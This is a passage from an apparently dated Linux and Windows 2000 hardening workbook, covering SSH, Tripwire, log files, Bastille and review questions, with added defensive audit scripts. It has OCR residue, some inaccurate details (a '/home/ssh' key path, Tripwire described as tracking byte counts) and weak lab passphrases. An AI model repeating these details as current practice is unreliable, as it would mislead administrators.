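audit_ssh_dir() {        # $1 = key directory, $2 = expected owner
  rc=0
  for f in "$1"/*_key; do
    [ -e "$f" ] || continue
    check_private_file "$f" "$2" "private key" || rc=1
  done
  for f in "$1"/*.pub; do
    [ -e "$f" ] || continue
    if [ -r "$f" ]; then echo "OK   $f: public key readable"
    else echo "FAIL $f: public key is not readable"; rc=1; fi
  done
  return $rc
}
```

Run audit_lilo_conf /etc/lilo.conf root and audit_ssh_dir /etc/ssh root on the server; each prints one FAIL line per problem and exits nonzero when anything is found, so the check is easy to schedule from cron and alert on.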

TASK 3E-2
Configuring an SSH Server

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. In the Terminal Window, enter /sbin/service sshd start to start the SSH Server.
2. If necessary, acknowledge that you want to generate key pairs. The keys might have been generated during the install of the OS.
3. In the Terminal Window, navigate to /etc/ssh.
4. Check the permissions on the key files. Remember, you can use the ls -l command to do this.
5. Close all windows. The SSH server is now running.

Configuring and Using the SSH Client

The client side is straightforward as well. You must have openssh-clients and openssh installed on the client side, in comparison to openssh-server and openssh on the server side. If the required packages are installed, you are ready to walk through the process of SSH on the client side.

1. Log in as your normal user account.
2. To generate the private and public key pair that you will use, use the /usr/bin/ssh-keygen command. The pair will be located in your /home/ssh directory.
3. Enter the command to access the remote SSH server. If the SSH server is SSH1.example.com, your command would be ssh SSH1.example.com.
4. If this is the first time you have connected to this machine, you will be prompted that the authenticity of the host can't be established. Click Yes to continue. The prompt is due to your machine not having information on the remote SSH server.
5. When you answer Yes, an entry is made in the known_hosts file in your /home/ssh directory. You are then prompted for your user name and password. Enter your credentials to complete the connection to the SSH server.

Every user on the system will have a unique key pair.

TASK 3E-3
Configuring an SSH Client

Setup: You are logged on to Red Hat 8 as root. Students should work in pairs for this exercise.

1. In a Terminal Window, enter /usr/bin/ssh-keygen -t rsa to generate a new key pair.
2. Accept the default location for storing the key pair. The default will be in your user account's home directory.
3. When you are prompted for a passphrase, enter your first name. This passphrase must be at least five characters, so if you have a short first name, add some letters or numbers to it. Confirm the passphrase when you are prompted to do so.
4. In the Terminal Window, navigate to your /root/.ssh/ directory.
5. Verify the key pair and the permissions. Again, use the ls -l command to do this.
6. Enter ssh a.b.c.d, where a.b.c.d is your partner's IP address, to connect to your partner's computer.
7. Because it is your first connection to the remote SSH server, you are prompted to continue the connection. Answer Yes to continue the connection.
8. When prompted, enter your credentials, just as you would if you were using telnet. Use your Linux credentials, not the passphrase.
9. Navigate as you would in a telnet session to verify connectivity, then close the session by using the exit command.
10. If necessary, navigate to the known_hosts file in your /home/user.ssh/ directory. Enter cat known_hosts to view the entry for your partner's computer.
11. Close all windows.

Tripwire

Tripwire is the most commonly used file-integrity checker for Linux. It is often used as part of a company's intrusion detection system (IDS) because it can be used to maintain a snapshot taken of your system while in a known-good state, which it will compare against the running system at regular intervals to determine if any of the protected files have been altered or otherwise tampered with.

tripwire: A software tool for security. Basically, it works with a database that maintains information about the byte count of files. If the byte count has changed, it will identify it to the system security manager.

intrusion: Any set of actions that attempts to compromise the integrity, confidentiality, or availability of a resource.

Tripwire does this by creating a one-way hash value for a directory or file. This hash is stored, and when subsequent checks are made of that directory or file, Tripwire again hashes the object and compares the resulting hash against the stored value. If the hashes do not match up, a flag is raised, and various actions can then be taken, depending on the configuration of the policy.

It should be noted, though, that Tripwire is not a true integrity checker in the purest sense of the word, because Tripwire does not check some properties such as the inode information.

The Tripwire Modes

Tripwire has several modes that the user should be familiar with:

Database Initialization Mode is usually one of the first modes used. It will create the snapshot of your system that Tripwire will use for integrity checking.

Integrity Checking Mode is usually run after the database has been created. This mode searches the system for differences when compared to the baseline database. This mode will generate a detailed report of any violations found in accordance with the Tripwire policy.

Database Update Mode is used to change your baseline database. For instance, if you monitor your /etc/shadow file and you have created accounts for two new employees, your integrity check will always report the violation, even though you needed those two changes. You could run in Database Update Mode to alter your database to include the two new changes.

Policy Update Mode is used to update changes to Tripwire's policy file.

Test Mode is used to test the ability of Tripwire's email notification system. When used, this will send a test message to the account specified.

The Tripwire Policy

The Tripwire Policy file, twpol.txt, is normally found in the /etc/tripwire directory and is a plaintext document that is configured by default to check most of the files in the Red Hat install.

Figure 3-27: The editable twpol.txt file.

This file can be altered like any text document to configure the policy so that only the files you specify will be checked. In addition to defining what files should be checked, there are several options that will determine how Tripwire will react while checking those files. This is a small list of some of the more important options that can be used:

/etc/shadow -> $(IgnoreNone) tells Tripwire that it should report any and all changes made to the shadow file.

!/proc tells Tripwire to ignore the entire /proc directory.

/etc/shadow -> +ug (emailto=admin@some_company.net) tells Tripwire to email an alert if there is a change noticed in the shadow file.

/var/log/maillog -> $(Growing) tells Tripwire that the file is expected to get larger (as most logs do), but still to alert if the file gets smaller.

alert: A formatted message describing a circumstance relevant to network security. Alerts are often derived from critical audit events.

After the policy file has been configured, it is time to start things rolling. From the /etc/tripwire directory, run the command ./twinstall.sh to start the process of creating key pairs for securing files, creating the twpol file, and creating the backup of the twpol file.

Figure 3-28: Tripwire setup and passphrase request.

The Tripwire Database

The Tripwire database will be generated using the configuration parameters that were defined earlier. To start the database-creation process, run the tripwire --init command. Depending on the number and size of the files that are being checked, the database generation can take a significant amount of time. It is for this reason that, when we change the policy, we will be checking only a single file! To view the specifics of the database, run the twprint --print-dbfile command.

The Tripwire Integrity Check

Once the database has been created, it's generally a good idea to make sure that the notification system is operating properly by using the test parameter. To do this, enter the tripwire --test --email root@localhost command into a Terminal Window.

Figure 3-29: The Tripwire mail test.

To actually run an integrity check, use the tripwire --check command.

There are a few switches that you might want to use if you are automating this with a script. The -s switch will not display the report to standard output, usually because you will not be logged in when the script is set to run. The -M switch will tell it to email the report if you have placed an emailto= line in your policy. To read the results of a report, use the twprint --print-report -r /var/lib/tripwire/report/XXXXX.twr command, where XXXXX.twr is the name of one of the report files located in the /var/lib/tripwire/report/ directory.
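The mechanism the text describes (hash every protected file once to build a baseline, then hash again later and compare) is small enough to write out in full. The following shell script is an added example, not Tripwire's own code: it keeps its baseline as a plain text file of SHA-256 digests (Tripwire's database is signed and uses its own format) and reports added, changed and removed files, which is the distinction the Tripwire report's Object Detail sections make. The tree and database paths are parameters, and the files used to exercise it are constructed:

```shell
#!/bin/sh
# Added example (not Tripwire's code): the mechanism the text describes,
# a baseline of one-way hashes that later runs are compared against.
# integrity_init writes the baseline, integrity_check re-hashes the tree
# and reports what was added, changed or removed. Tree and database
# paths are parameters (an assumption); the database must live outside
# the tree it describes, and the baseline must not be empty.

# sha256sum is coreutils; shasum -a 256 is the BSD/macOS fallback.
# Both print "<64 hex digits>  <path>".
hash_file() {
  if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1"
  else shasum -a 256 "$1"; fi
}

# Hash every regular file under $1, one line each, in a fixed order so
# two snapshots of the same tree compare line for line.
snapshot() {
  find "$1" -type f | LC_ALL=C sort | while IFS= read -r f; do
    hash_file "$f"
  done
}

# Database Initialization: record the baseline of tree $1 in file $2.
integrity_init() { snapshot "$1" > "$2"; }

# Integrity Check: compare a fresh snapshot of tree $1 with baseline $2.
# Prints ADDED/CHANGED/REMOVED lines, sorted; returns 0 only if the
# tree still matches the baseline.
integrity_check() {
  report=$(snapshot "$1" | awk '
      # hash is the first 64 characters, path starts at column 67,
      # so paths containing spaces survive intact
      { h = substr($0, 1, 64); p = substr($0, 67) }
      NR == FNR { base[p] = h; next }          # first input: baseline
      { seen[p] = 1
        if (!(p in base))      print "ADDED " p
        else if (base[p] != h) print "CHANGED " p }
      END { for (p in base) if (!(p in seen)) print "REMOVED " p }
    ' "$2" - | LC_ALL=C sort)
  [ -z "$report" ] && return 0
  printf '%s\n' "$report"
  return 1
}
```

Keep the baseline file outside the tree it describes and, as the Best Practices text recommends for Tripwire's database, on media the host cannot modify; if an intruder can rewrite the baseline, the check proves nothing.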

Best Practices

To automate the running of Tripwire, you can run it as a cron job. By default, Red Hat has an entry in the /etc/cron.daily/ directory to have Tripwire run daily. If it is not there, you can create a simple job to run, similar to the following:

1. Create a new text file named tripwire, and enter the following lines:

    #!/bin/bash
    # Daily Tripwire Check
    /usr/sbin/tripwire --check -M

2. Place the new file in the /etc/cron.daily/ directory.
3. Make the file executable by running the chmod -v u+x tripwire command.

To change your database, update the policy file (twpol.txt) as needed, and then run the tripwire -m p /etc/tripwire/twpol.txt command.

It is generally a good idea not to keep the database in its default location (/var/lib/tripwire/hostname.twd), because anyone who gains unauthorized access to the system might be able to update the database so that it will not report any of the files that were altered. Often, the database is placed onto read-only media, such as a CD-ROM. In such a case, the integrity check command would have to include the -d option to tell Tripwire where the database is located; for example: tripwire --check -d /mnt/cdrom/dbfile.twd

TASK 3E-4
Starting Tripwire

Setup: You are logged on to Red Hat 8 as root.

In the interest of time, you will be checking and tracking only the shadow password file for changes. In a production install, you would obviously be tracking changes far more thoroughly.

1. Start Nautilus File Manager, and navigate to /etc/tripwire.
2. Make a backup copy of the twpol.txt file.
3. Open the twpol.txt file in a text editor such as Emacs. Edit the twpol.txt file to read as follows:

    @@section FS
    SIG_HI = 100;
    (
      rulename = "Passwd Check",
      severity = $(SIG_HI),
      emailto = root@localhost
    )
    {
      /etc/shadow -> $(IgnoreNone);
    }

As with the smb.conf file, you can delete all of the existing text because you have a backup of the original configuration file.

4. Save and close the file.
5. In a Terminal Window, navigate to the /etc/tripwire directory, and enter ./twinstall.sh to run the Tripwire install.
6. When you are asked for a site keyfile passphrase, enter and confirm twpass as the site passphrase.
7. When you are prompted to provide a local keyfile passphrase, enter and confirm localpass as the local passphrase.
8. When you are prompted for the site passphrase, enter twpass to continue with the install. You will be notified that the configuration file was written to the /etc/tripwire directory as tw.cfg, and that a cleartext version, called twcfg.txt, was written for your inspection. After inspecting twcfg.txt, you should delete it for security purposes.
9. When you are prompted for your site passphrase so that the new policy can be signed, enter twpass to complete the setup routine.
10. In the Terminal Window, enter tripwire --init to start Tripwire.
11. When you are prompted for the local keyfile passphrase, enter localpass to provide the local passphrase.
12. Observe the message that states the database was successfully generated.
13. In the Terminal Window, enter tripwire --test --email root@localhost to test the email capabilities of Tripwire. You will see a message telling you that an email is being sent.
14. To see if the email was delivered correctly, switch to Nautilus File Manager, and navigate to the /var/spool/mail/ directory.
15. Right-click the root file, and choose Open In New Window to open the Tripwire email. If you have not deleted this file recently, you may have several messages from the system already; scroll down to the bottom, and the test email from Tripwire should be there.
16. Navigate to the email folder (/var/spool/mail/), and delete the root file. This will make it easier for you to find future email messages.
17. Switch back to the Terminal Window, and enter tripwire --check -M to perform an integrity check and have Tripwire email you the report.
18. Return to the /var/spool/mail/ directory, and verify that you have a new root file.
19. Rename the root file to rootfirst to rename the Tripwire email report.
20. Open the rootfirst file by right-clicking it and choosing Open In New Window. This is the report you just generated, which is also visible in the Terminal Window if you scroll up a little. Keep the window open; we will compare this report to the next report we generate.
21. From the Red Hat Main Menu, choose System Settings→Users And Groups to open the Users And Groups tool.
22. Select any user that you created during an earlier exercise, change the user's password, and exit the tool.

If, for some reason, you have removed all accounts except the root account, you can also add a new user account to accomplish the same goal.

23. Switch to the Terminal Window, and run the tripwire --check -M command again.
24. Return to the /var/spool/mail/ directory, and open the new root file. Compare it to the rootfirst file, looking for differences. Pay particular attention to the Object Detail sections to view the differences. In the Tripwire reports, Access Time will always show up, but the Modify and Change times should not differ unless there has been a change to the file (as would be the case if someone created a new account or modified a password).
25. Close all windows.

Logging

Logging is a necessary evil in all operating systems. In Linux, you are presented with the ability to log enormous amounts of data. You can log the system, applications, and protocols. The output of most of the logs is text files in the /var/log directory. Figure 3-30 shows a partial listing of the /var/log directory on Red Hat Linux 8.0.

Figure 3-30: The /var/log file.

There are far too many log files to cover in this lesson, so you will examine several of the critical log files as they relate to security. The first two logs are called lastlog and last.

The lastlog Log File

The /var/log/lastlog file tracks the last login of user accounts into the system. The full log will provide extensive information, so if you are just curious about a single user account, use the command syntax: lastlog -u <username>. This is a temporary log, one that you should back up daily if you want to use this data over time.

Figure 3-31: The /var/log/lastlog file.

The last Log File

The last file tracks the last login data, similar to the previous example, but adds another level of information. This file can report on the users, their IP addresses (or hostnames), the date and time of the last connection, and the duration of the last session. Stored in /var/log/wtmp, this log can be viewed by using the last command in the Terminal Window. If you are looking for information on a specific user account, use the syntax: last <username>. Using the -a option will display hostname information, and the -d option will display hostname and IP address information.

Figure 3-32: The last log output with the -a and the -d options.

TASK 3E-5
Logging Recent Login Activity

Setup: You are logged on to Red Hat 8 as root.

1. In Nautilus File Manager, navigate to the /var/log directory.
2. Observe the logs that are stored in this directory.
3. In a Terminal Window, navigate to the /var/log directory.
4. Enter lastlog to view the lastlog file.
5. In another Terminal Window, enter last -a -d root to check the last log for root.
6. Close all windows.

The xferlog Log File

If your system is running FTP, you will most likely want to track the file transfers taking place. The xfer log is the one you will investigate for these details. Usually found in the /usr/adm directory, the log contains server entries, each composed of a single line. You can read this output in the Terminal Window by simply viewing /var/log/xferlog (you may end up using the more option). The fields that this log can track are extensive, and include:

The date of the transfer.
The time of the transfer.
The duration of the transfer.
The client hostname and IP address.
The size of the file transferred.
The file name of the file transferred.
The transfer type (ASCII or binary).
The direction of the transfer (incoming or outgoing).
The authentication method.
The access method (anonymous, guest, or user account).

Web Server Log Files

Just as you will want to track your logs for an FTP server, if you are running a Web server, such as Apache, you will want to have solid logging of the Web connections. The Apache server process generally has two logs, found in /var/log/httpd. The two logs are:

access_log: Logs clients who contacted the Web server, when, how, and what the client did while connected.
error_log: Logs access attempts, both successes and failures.

More information might be logged depending on how httpd.conf is configured on the Apache server.

The access_log will track the client's IP address, the time and date of access, the command or request the client made, and the status code. The status codes are listings such as:

200: Transfer completed without error.
201: A successful POST command has completed.
300: Client requested data that has moved.
404: The requested document was not found.

The error_log will track data such as the date and time of the connection, the type of error report, the reason for the error, the service, and the action taken (if any).

The secure Log File

When you were configuring services for xinetd and for TCP wrappers, there was an option in the configuration file of the service for log_on_failure and log_on_success. You can view entries from these options, as well as SSH connection status, in the /var/log/secure file.
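The xferlog fields and the Apache status codes listed above are what you key on when reading these logs for signs of trouble rather than just browsing them. The following awk reports are an added example, not part of the course materials; they run over constructed sample lines in Apache common log format and wu-ftpd xferlog format (the addresses, file names and paths are invented), and on a live host you would point the functions at /var/log/httpd/access_log and /var/log/xferlog instead:

```shell
#!/bin/sh
# Added example (not from the course): small awk reports over the two
# log formats this section describes. The log lines are constructed
# samples, not real traffic.

write_sample_logs() {   # $1 = directory to create the two sample files in
  cat > "$1/access_log" <<'EOF'
10.0.0.7 - - [13/Oct/2003:09:15:01 -0500] "GET /index.html HTTP/1.0" 200 2326
10.0.0.7 - - [13/Oct/2003:09:15:04 -0500] "GET /images/logo.gif HTTP/1.0" 200 884
10.0.0.9 - - [13/Oct/2003:09:16:10 -0500] "GET /cgi-bin/test.cgi HTTP/1.0" 404 295
10.0.0.9 - - [13/Oct/2003:09:16:11 -0500] "GET /admin/ HTTP/1.0" 404 295
10.0.0.9 - - [13/Oct/2003:09:16:12 -0500] "GET /scripts/ HTTP/1.0" 404 295
10.0.0.9 - - [13/Oct/2003:09:16:13 -0500] "POST /upload HTTP/1.0" 201 120
10.0.0.7 - - [13/Oct/2003:09:17:00 -0500] "GET /old/page.html HTTP/1.0" 300 310
EOF
  cat > "$1/xferlog" <<'EOF'
Mon Oct 13 09:20:11 2003 1 10.0.0.7 4096 /pub/readme.txt a _ o a jane@example.com ftp 0 * c
Mon Oct 13 09:21:40 2003 3 10.0.0.9 81920 /incoming/tool.tgz b _ i a guest@ ftp 0 * c
Mon Oct 13 09:22:05 2003 2 10.0.0.12 2048 /home/bob/notes.txt a _ o r bob ftp 1 bob c
EOF
}

# Per-client count of each HTTP status code, as "client status count"
# lines. In common log format the status is the second-to-last field
# and the size transferred is the last.
status_counts_by_client() {   # $1 = access_log
  awk '{ n[$1 " " $(NF-1)]++ } END { for (k in n) print k, n[k] }' "$1" \
    | LC_ALL=C sort
}

# Clients that produced at least $2 "not found" responses. A burst of
# 404s from one address is the usual footprint of someone probing for
# scripts and directories that are not there, so it deserves a look.
clients_with_many_404() {      # $1 = access_log, $2 = threshold
  awk -v t="$2" '$(NF-1) == "404" { c[$1]++ }
                 END { for (h in c) if (c[h] >= t) print h, c[h] }' "$1" \
    | LC_ALL=C sort
}

# Anonymous uploads. In xferlog, field 7 is the client host, 8 the
# size, 9 the file name, 12 the direction (i = incoming, o = outgoing)
# and 13 the access mode (a = anonymous, g = guest, r = real user).
anonymous_uploads() {          # $1 = xferlog
  awk '$12 == "i" && $13 == "a" { print $7, $9, $8 " bytes" }' "$1"
}
```

Two patterns are reported: a client whose 404 count crosses a threshold you choose, and files dropped into the FTP server by anonymous users; both are the kind of entry a daily review of these logs should surface.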

Using the Log Viewer

You might become comfortable reading the logs directly from their sources. However, in Red Hat, there is a utility that is designed to help with reading and managing the log files. This utility, called the Log Viewer, can be found under the Red Hat Main Menu by choosing System Tools→System Logs, or in a Terminal Window by using the redhat-logviewer command. The logviewer program is able to display only those log files that it knows exist. The configuration file that stores the available logs is found at /etc/sysconfig/redhat-logviewer. The Log Viewer is shown in Figure 3-33.

Figure 3-33: The logs presented in the Red Hat Log Viewer.

The Red Hat Log Viewer is a dynamic program, meaning that it keeps updating the information seen on-screen to remain current. The default refresh rate is 30 seconds. The default can be changed in the viewer (by altering the Preferences) or directly in the sysconfig file, where the available logs are stored. You can also force an immediate refresh by using the File→Refresh Now command, or by pressing Ctrl+R.

TASK 3E-6
Using the Log Viewer

Setup: You are logged on to Red Hat 8 as root.

1. From the Red Hat Main Menu, choose System Tools→System Logs to open the Log Viewer.
2. View the Security Log, noting the records of access.
3. View the System Log, noting the records of access.
4. Another handy log to view is the one that defines the RPM packages installed. Check the RPM Packages list to see the OpenSSH components that are installed.
5. Once you have viewed all the information you want, close the window.

Securing Log Files

Although reading the log files directly can provide you with the information you are seeking, there is a risk in leaving the files on the computer itself. If an attacker does compromise the server, an initial target will be to wipe out any log files that can trace the attacker's activities.

One option to combat this is to use syslog. Syslog is the logging subsystem in Linux (and UNIX) that controls the logging function. A benet of syslog is that it is possible to have logs forwarded to another system in the network. The primary conguration le for syslog is /etc/syslog.conf.

Bastille

Bastille is an Open Source program that can help you automate many of the processes for hardening a Linux machine. It can help ease an administrator's job by making several tasks (like implementing IPChains, enabling or disabling services, and closing unused ports) quick and simple by asking the user a long series of mostly yes or no type questions.

compromise: An intrusion into a computer system where unauthorized disclosure, modification, or destruction of sensitive information may have occurred.

Bastille's Abilities

Bastille has the ability to help automate many security-minded functions on a system, including:

Disabling the compiler.
Creating login banners.
Restricting resource usage.
Disabling IP-based authentication protocols for anti-spoofing protection.
Finding and updating RPMs by using the Red Hat errata Web site (www.redhat.com/support/errata).
Restricting access to many common administration utilities.
Disabling system shutdown via the Ctrl+Alt+Delete key combination.
Protecting the LILO with a password.
Running an IPChains script to automate much of the configuration to make the machine a firewall.
Configuring NAT settings (as part of IPChains).
Limiting console login rights.
Configuring remote logging.
Removing unneeded daemons.
Hardening Apache (not always as predictable as you might expect).
Setting password aging parameters.

spoofing: Pretending to be someone else. The deliberate inducement of a user or a resource to take an incorrect action. An attempt to gain access to an AIS by pretending to be an authorized user. Impersonating, masquerading, and mimicking are forms of spoofing.

Installing and Using Bastille

To install Bastille, you will need the RPM for Bastille, as well as the pwlib and perl-Tk RPMs. The RPMs should be installed in that same order; then, from a Terminal Window, issue the command bastille to start the Bastille configuration routine. From there, follow the prompts and answer all the questions before continuing on to the next section. The left side of the screen lists the section of the configuration you are dealing with (the Module). The top right lists the question you are presently dealing with. The center right has a brief description of, or the purpose of, the current module. The bottom right is where you answer the yes or no question.

Figure 3-34: Bastille Q&A.

For some of the questions, you can opt to enter things like warning banners. When it is time to enter the text for your message or to enter a password (for any question that can't be answered yes or no), just type the text into the bottom-right window labeled Answer.

Undoing Configuration Changes

The best way to make sure that you do not need to undo any changes is to follow the old carpenter's adage: measure twice, cut once. By this, we mean that you should make a change only if you understand the repercussions of the choices you are making. However, this isn't a perfect world, and sometimes changes need to be made. For this reason, there are a few possible ways to undo the changes made to a system. Of course, they aren't 100 percent, so always try to measure twice before cutting! To undo configuration changes, you can try the following:

Rerun Bastille, and make different choices to reverse the previous answers. To do this, navigate to the Bastille directory and use the ./InteractiveBastille.pl command.

There is also a Perl script that was made to try to undo changes; accurately enough, it is named undo.pl, and is located in the Bastille directory.

The last way to attempt a reversal of Bastille changes is to go to the backup directory (/root/Bastille/undo/backup); this directory contains copies of the system files that Bastille has altered. You should, with relative ease, be able to replace most of these files, even if it will not be a fast or automated solution.

It should be obvious, with all that Bastille can control, that you should be careful with your configuration choices. Selecting options that you don't fully understand can cause problems with running programs and accessing the machine for legitimate uses. It is for this reason that the Bastille routine should be run, but not implemented, on your machine in class. Feel free to explore all the options, but do not apply the configuration changes!

TASK 3E-7
Installing and Exploring Bastille

Setup: You are logged on to Red Hat 8 as root.

1. Create the directory /bastille where you will store the Bastille files.
2. Copy the three required files to the /bastille directory. The files are:

    Bastille-2.0.4-1.0.i386.rpm
    pwlib-1.3.3-5.i386.rpm
    perl-Tk-800.023-9mdk.i586.rpm

The method by which you will be given these files will be explained by your instructor. In most cases, you will be provided with a CD-ROM or a network-share URL, or the files will already be on your hard drive.

Version numbers used in class may differ from these examples. If that is the case, alter your commands to reflect the different version numbers.

3. In a Terminal Window, navigate to the /bastille directory, and enter the following commands, in sequence:

    rpm -ivh Bastille-2.0.4-1.0.i386.rpm
    rpm --nodeps -ivh pwlib-1.3.3-5.i386.rpm
    rpm --nodeps -ivh perl-Tk-800.023-9mdk.i586.rpm

You might get a message saying that pwlib is already installed. If so, continue with the activity.

Again, modify these lines to refer to the correct version numbers if you are using different releases of these RPMs.

4. 5.

After the RPMs are nished with their routines, enter bastille into the Terminal Window to start the Bastille program. A disclaimer is displayed. Read the disclaimer, and enter accept to continue with the install. A GUI interface is displayed, where you will answer a series of questions to alter the conguration of your machine. For each question, read the explanation, select the answer that best ts your requirements, and click OK to move to the next question. Dont be concerned if this step takes a little whilethere are a lot of questions and descriptions to read and answer. When you are done with all of the modules, click OK to continue.

6.

7. 8.

When you are prompted, save the conguration. When the Finishing Up window is displayed, click the Exit Without Changing System button.

You do not want to apply some of the possible settings as this may have an adverse effect on your ability to participate in later exercises that use Linux.

Ed
T DU

or
DO NO

In

232

Hardening The Infrastructure (SCP)

st

ru ct
9. Close all windows.

Summary

In this lesson, you examined the fundamentals of Linux operation. You created files and directories, and configured the security on them. You examined how the system secures passwords by using the shadow password file. You secured access to services, using TCP wrappers and xinetd. You also examined the security of several network services, and the lesson ended with the use of Bastille for final system hardening.

Lesson Review

3A What is the command to view the contents of a directory? The ls command.

By default, a new user account has a UID of at least what? 500.

What is the default UID for the root account? 0.

3B What is the octal permission for the setting of rwx? 7.

What is the command to change ownership of an object? The chown command.

What is the umask value if permissions are set to 000? 777.

Is the number of days to a password change stored in the /etc/passwd or the /etc/shadow file? In the /etc/shadow file.

3C What are the two configuration files used by TCP wrappers to control access? The /etc/hosts.deny and /etc/hosts.allow files.

What is the configuration file that controls xinetd? The /etc/xinetd.conf file.

In xinetd, what line will grant access from the network host 10.20.23.45? only_from 10.20.23.45

3D In NFS, what line will export the /tech directory to 10.20.30.41 with read and write access? /tech 10.20.30.41(rw)

In NFS, what line will export the /policy directory to the 10.20.30.0/24 network with read-only access? /policy 10.20.30.0/24(ro)

Why must you watch for a space in the configuration lines of an NFS export? The space can change the meaning of the command. For example, a space between the host and permissions can change the permissions to become world-writeable.

What is the name of Samba's primary configuration file? Smb.conf.

3E To add a password during system startup, what file do you need to modify? The /etc/lilo.conf file.

What is the GUI tool to use to find services on the system? The Service Configuration tool.

What is the GUI tool to use to view the /var/log files? The Log Viewer tool.

What is the name of the text file that Tripwire reads to create its policy file? The file is named twpol.txt.

What is the name of the perl script that will attempt to reverse changes that Bastille has made to a system? The file is named undo.pl.
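The review answer on the NFS space problem is easy to state but easy to miss in a real exports file. The following Python script is an added example, not part of the course materials: it parses /etc/exports entries the way exportfs reads them, so that "host (rw)" with a space becomes a host entry with default options plus a bare "(rw)" that applies to every client, and it reports any export that the world can mount read-write. The sample exports content is constructed for the demonstration; the /tech and /policy lines are the review's own answers.

```python
import re

# Constructed sample /etc/exports content for this demonstration (not a real file).
# /tech and /policy are the review answers; /scratch contains the space mistake.
SAMPLE_EXPORTS = """\
# constructed sample
/tech    10.20.30.41(rw)
/policy  10.20.30.0/24(ro)
/scratch 10.20.30.41 (rw)
"""

# The exportfs defaults that matter here, applied to a client that carries no options.
DEFAULT_OPTIONS = frozenset({"ro", "root_squash"})

# A client token is "host" or "host(opt,opt)"; a bare "(opt)" has an empty host part.
_CLIENT = re.compile(r"([^()]*)(?:\((.*)\))?")


def parse_export_line(line):
    """Split one /etc/exports line into (path, [(client, options), ...]).

    "10.20.30.41(rw)" binds rw to that host.  Once "10.20.30.41 (rw)" is split
    on whitespace, "(rw)" is a token with no client in front of it, which
    exportfs treats as "*(rw)": read-write for everyone.  The host itself is
    then left with the defaults.  Returns None for blank and comment lines.
    """
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    path, *client_tokens = line.split()
    clients = []
    for token in client_tokens:
        match = _CLIENT.fullmatch(token)
        if match is None:
            raise ValueError(f"malformed client entry {token!r} for {path}")
        client = match.group(1) or "*"
        opts = match.group(2)
        options = frozenset(opts.split(",")) if opts else DEFAULT_OPTIONS
        clients.append((client, options))
    return path, clients


def world_writable_exports(exports_text):
    """Return the paths that any client at all can mount read-write."""
    offenders = []
    for raw in exports_text.splitlines():
        parsed = parse_export_line(raw)
        if parsed is None:
            continue
        path, clients = parsed
        if any(client == "*" and "rw" in options for client, options in clients):
            offenders.append(path)
    return offenders


if __name__ == "__main__":
    for path in world_writable_exports(SAMPLE_EXPORTS):
        print(f"WARNING: {path} is exported read-write to every host")
```

Run against the real file with `world_writable_exports(open("/etc/exports").read())`; the same parser also lets you list exactly which client gets which options, which is the check to make before restarting the NFS server.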

LESSON 4
Hardening Windows Computers

Data Files: NIST2kws.inf
Lesson Time: 6 hours

Overview
In this lesson, you will investigate the concepts and procedures required to secure Microsoft Windows computers. You will examine everything from the basic principles of Windows NT security, up to the advanced issues of securing a Windows 2000 machine running Active Directory.

Objectives
In this lesson, you will:

4A Examine the concepts of Windows 2000 infrastructure security. You will create a custom GPO and edit it to use in the securing of the Windows 2000 infrastructure.

4B Examine the fundamentals of authentication in Windows 2000. You will describe the local logon process in Windows 2000.

4C Implement Windows 2000 security configuration tools. You will implement and examine security templates, secedit.exe, and use the Security Configuration and Analysis Snap-in.

4D Secure Windows 2000 resources. You will examine the security of Windows 2000 resources and configure security settings in the Registry.

4E Configure Windows 2000 auditing and logging. You will configure auditing and logging on a Windows 2000 computer and analyze Security Log Event IDs.

4F Examine and configure EFS on Windows 2000. You will examine the components of and implement the Encrypting File System (EFS) on Windows 2000.

4G Examine the methods of securing network communications in a Windows 2000 network. You will examine the systems available to secure network communications in Windows 2000, and you will configure RADIUS and the securing of TCP/IP.

Topic 4A
Windows 2000 Infrastructure Security

For years, Windows NT 4.0 served its market well. It provided a broad platform for business functions and gained widespread use and popularity. However, it was beginning to show its age, and Microsoft needed to move on. What it moved on to was Windows 2000.

With a completely different approach to managing the network, Windows 2000 has some new components that network administrators must get comfortable with. In this topic, you will take a look into these new components and how they tie into securing both the network itself and resources on the network.

In Windows 2000, if you install multiple computers in a logical group, and they share resources with one another, you have created a workgroup. The workgroup is commonly referred to as peer-to-peer networking because every machine is an equal, or peer, to the other. In a workgroup, you can have a server; it is simply referred to as a stand-alone server. In this case, there is no controlling security mechanism to the network, and each machine will use its own local security database to control access to resources.

In Windows 2000, a local security database is a list of user accounts and resource access data, located on each local computer. So, if you had a peer-to-peer network of 20 Windows 2000 computers, you would have 20 local security databases, one for each machine. Although this works, it is inefficient for management, both of resources and of security.

The major step up in the design of a Windows 2000 network came with the new domain model of Windows 2000. The multiple domain models of Windows NT 4.0 are gone. In their place is a design where you still group computers together, but they are controlled differently.

In a Windows 2000 domain, you have grouped together computers and users who share a central directory database. This directory database contains user accounts, security information, service information, and more, for the entire domain. Access to this directory is based on LDAP. This directory database and its access method together are referred to as Active Directory (AD), also called the Windows 2000 directory service (NTDS).

The Windows 2000 domain model governed by AD is a replacement for all the domain models of Windows NT 4.0. In AD, there are no machines designated as Primary or Backup Domain Controllers. Instead, every server that will participate in the management of the domain is simply called a Domain Controller, and contains a master copy of the directory database. (Domain Controllers must be running Windows 2000 Server.)

A Windows 2000 domain is not bounded by location or network configuration. Machines that are in a domain can be close together on a LAN (connected via traditional Ethernet) or far apart over a WAN (connected via fractional T1, E1, or any other WAN technology). The Active Directory is a database listing of information on each of the objects in the domain. This information includes how each of these objects will interact with other objects in the directory. When you are using Active Directory in Windows 2000, this listing can include information on user accounts, groups, computers, servers, printers, security policies, and more. Active Directory may start out with a small number of objects and grow to hold thousands to millions of object listings.

WAN: (Wide Area Network) A physical or logical network that provides capabilities for a number of independent devices to communicate with each other over a common transmission-interconnected topology in geographic areas larger than those served by local area networks.

Active Directory Components

In Windows 2000, there are several critical components that make up a successful network implementation of Active Directory. These components are logical in nature and have no boundaries. They are domains, forests, trees, and Organizational Units (OUs). The components of AD that are more physical in nature are the domain controllers and sites (IP subnets that identify physical network segments). The functionality of AD separates the physical from the logical network structure.

One of the benefits of Active Directory is the ability to build a logical network that mirrors the logical structure of the organization. Using this logical structure is more intuitive to users, as they are able to find and identify resources by logical name, without having to have any knowledge of the physical layout of the network.

Active Directory objects themselves can be organized into what are known as classes. Classes represent a logical grouping of objects, at the discretion of the administrator. Object class examples include user accounts, computers, domains, groups, and Organizational Units (OUs). You also have the ability to create containers, which can hold other objects. A container is an object that is able to hold computers, users, and/or other objects.

